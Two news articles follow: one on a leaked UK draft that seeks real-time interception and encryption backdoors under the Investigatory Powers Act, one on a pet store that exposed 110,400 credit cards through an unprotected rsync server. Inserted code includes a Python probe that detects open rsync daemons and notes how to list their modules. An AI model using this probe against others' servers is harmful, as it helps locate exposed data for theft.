The UK government is soliciting feedback from a handful of internet providers, but
isn’t consulting the tech industry or the public.

The UK government is planning to push greater surveillance powers that would force
internet providers to monitor communications in near-realtime and install backdoor
equipment to break encryption, according to a leaked document.

A draft of the proposed new surveillance powers, leaked on Thursday, is part of a
“targeted consultation” into the Investigatory Powers Act, brought into law last
year, which critics called the “most extreme surveillance law ever passed in a
democracy.”

The proposals show that the government is asking for powers to compel internet
providers to turn over the real-time communications of a person “in an intelligible
form,” including encrypted content, within one working day.

To that end, internet providers will be forced to introduce a backdoor point on their
networks to allow intelligence agencies to read anyone’s communications.

This “backdoor” capability was heavily criticized last year when it was floated as
part of the draft law’s proposal. Apple chief executive Tim Cook last year warned of
“dire consequences” if the legislation required internet providers or companies to
put backdoors into their systems. The provision would effectively prohibit companies
operating in the UK from introducing end-to-end encryption, a feature now commonplace
in many messaging apps, including Facebook Messenger, WhatsApp, and Apple’s own
messaging platform iMessage.

But it’s not clear exactly how the provision would be enforced — or if it would only
affect companies operating or based in the UK.

Similar questions arose when a committee of UK lawmakers criticized the original
Investigatory Powers Act prior to it becoming law late last year.

Jim Killock, executive director of Open Rights Group, who obtained the document, said
in an email that the proposals, if passed, would “make security products much easier
to break into, and means that companies may be obliged to lie to their customers
about the privacy and security that is applied to their communications.”

The draft document also asks for the capability to intercept, in real time, the data
of one out of every 10,000 citizens, allowing the government to wiretap over 6,500
people at any given time.
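The 1-in-10,000 figure squares with the 6,500 number if you assume a UK population of roughly 65 million (my assumption; the document doesn't state it):

```python
# Rough 2017 UK population; an assumption, not a figure from the article
uk_population = 65_000_000

# The draft asks for real-time intercept capacity of 1 in every 10,000 citizens
simultaneous_taps = uk_population // 10_000
print(simultaneous_taps)  # 6500
```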

But the lack of transparency over the proposals has already drawn ire.

“The government doesn’t think it has any legal or moral obligation to consult anyone
outside of industry partners and the security services,” said Killock.

So far, the draft document has only been circulated among the UK government’s
technical advisory board, consisting of six telecoms giants, including O2, BT, BSkyB,
and Vodafone, as well as government agencies who would use the powers, thought to
include at least MI5 and GCHQ.

But the document was not made readily available on the government’s website, or to
partners in the tech industry, who would be directly affected by the provisions if
passed into law.

The consultation is open for the next three weeks until May 19, said Killock, during
which anyone can file a response with the Home Office.

A spokesperson for the Home Office did not respond to a request for comment at the
time of writing.


A database of thousands of credit cards was left exposed on the open internet

The data was exposed for at least six months — likely longer.

A US online pet store has exposed the details of more than 110,400 credit cards used
to make purchases through its website, researchers have found.

In a stunning show of poor security, the Austin, Texas-based company
exposed its entire customer database, including names, postal and email addresses,
phone numbers, credit card information, and plain-text passwords.

Several customers that we reached out to confirmed some of their information when it
was provided by ZDNet, but they did not want to be named.

The database was exposed because of the company’s own insecure server and use of
“rsync,” a common protocol used for synchronizing copies of files between two
different computers, which wasn’t protected with a password.
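An rsync daemon announces itself before any authentication happens, so an exposed passwordless instance is easy to spot from outside. A sketch of such a check, assuming the daemon listens on rsync's default port 873 (per-module passwords, when configured, are only requested later in the exchange):

```python
import socket

def rsync_daemon_greeting(host, port=873, timeout=3.0):
    """Return the rsync daemon banner, or None if nothing rsync-like answers.

    A daemon sends '@RSYNCD: <protocol-version>' as soon as a TCP client
    connects; password checks, if any, happen later and per module.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            banner = sock.recv(64)
    except OSError:
        return None
    if banner.startswith(b"@RSYNCD:"):
        return banner.decode("ascii", errors="replace").strip()
    return None
```

A non-None result means the daemon is reachable and speaking the protocol to anyone; from there, sending `#list` would enumerate its shared modules.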

Researchers at the Kromtech Security Research Center found the database in November.
But after numerous efforts to contact the company by phone and email, the database
was only secured this week.

It’s not clear who’s to blame for the breach. The pet store is understood to have
been developed by DataWeb Inc., which has built dozens of other similar pet-related
sites and owns PegasusCart, an ecommerce platform used on all of DataWeb’s sites.
Kromtech researcher Bob Diachenko found that the leaked data wasn’t limited to the
pet store itself, but also appeared to contain several folders, including one that
shows several backup files and databases of transactions within the DataWeb network.

“They have everything in there — from ad campaigns to thousands of orders details,
with full customer payment details exposed, with IP addresses tracked down for
milliseconds,” said Diachenko, who also blogged about the discovery.

However, there’s no evidence to suggest that any PegasusCart data had been exposed.

Todd Nelson, co-founder of PegasusCart, said in an email that the owners of the site
“explained that, as of a year or so ago, their data was moved to an outside cloud
based ecommerce platform.” (At the time of writing, the store still used PegasusCart
on its website.)

“If they were breached on their web server and any data were found, it would be very
old and likely quite useless, but they jumped into action anyway,” he said.

“They have solicited a security firm to investigate the issue and plug any hole
should one exist,” he added, but he didn’t say if the company would inform its
customers of a breach.

The upside to the story is that the exposure has stopped, but it’s not clear who else
may have accessed the data — or if that data, such as credit card information, has
been used.

Gone are the days when hackers would target the larger companies en masse; such
attacks are now rare because of the stringent security measures and systems those
companies have in place. In other words, it’s harder than ever before to target the
highest echelons of big business.
Instead, criminals out to make a few bucks are increasingly targeting smaller
firms, which may not be as invested or knowledgeable in security.

According to Juniper Research, smaller companies usually have “less of a network to
keep under control” than larger organizations, but “even small data breaches are
likely to take a much larger toll on businesses with a smaller turnover.”

With a data exposure live on the internet for at least six months, there’s no telling
where the data has gone. But what’s clear is that if a security researcher found it,
it’s possible that others have, too.

